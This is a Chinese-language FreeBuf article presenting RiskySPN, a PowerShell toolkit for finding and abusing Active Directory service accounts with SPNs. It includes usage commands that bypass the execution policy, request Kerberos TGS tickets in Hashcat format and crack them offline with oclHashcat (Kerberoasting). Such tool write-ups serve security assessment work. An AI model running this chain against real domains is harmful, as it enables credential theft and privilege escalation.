如何使用RiskySPN检测和利用不安全的服务主体名称SPN
本文由 创作,已纳入「FreeBuf原创奖励计划」,未授权禁止转载
关于RiskySPN
RiskySPN是一系列功能强大的PowerShell脚本集合,可以帮助广大研究人员检测和滥用跟SPN(服务主体名称)相关的账户。除此之外,该工具不仅可以帮助蓝队研究人员识别存在安全风险的SPN,还可以帮助红队研究人员利用Kerberos和活动目录来实现权限提升。
工具要求
由于该工具中的脚本模块基于PowerShell实现,因此我们需要在能够运行PowerShell脚本的设备上使用该工具。
工具安装
广大研究人员可以直接使用下列命令将该项目源码克隆至本地:
git clone https://github.com/cyberark/RiskySPN.git
工具使用
安装模块
Import-Module .\RiskySPNs.psm1
或者,直接加载项目中的功能脚本:
. .\Find-PotentiallyCrackableAccounts.ps1
注意:这里需要确保Set-ExecutionPolicy的值设置成了Unrestricted或Bypass。
查看某个函数模块的详细功能信息
Get-Help Get-TGSCipher -Full
注意:所有的功能函数都提供了-Verbose模式。
搜索存在安全漏洞的SPN(服务主体名称)
搜索存在安全漏洞的账户:
Find-PotentiallyCrackableAccounts
敏感数据 + RC4 = $$$
生成包含漏洞账户的详细分析报告(CISO < 3):
Export-PotentiallyCrackableAccounts
获取凭证信息
请求Kerberos TGS:
Get-TGSCipher -SPN "MSSQLSvc/prodDB.company.com:1433"
或
Find-PotentiallyCrackableAccounts -Stealth -GetSPNs | Get-TGSCipher
其他使用方法
Find-PotentiallyCrackableAccounts -Sensitive -Stealth -GetSPNs | Get-TGSCipher -Format "Hashcat" | Out-File crack.txt oclHashcat64.exe -m 13100 crack.txt -a 3
许可证协议
本项目的开发与发布遵循GPL-3.0开源许可证协议。
项目地址
RiskySPN:【GitHub传送门】
参考资料
https://www.cyberark.com/resources/blog/service-accounts-weakest-link-in-the-chain
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
文章目录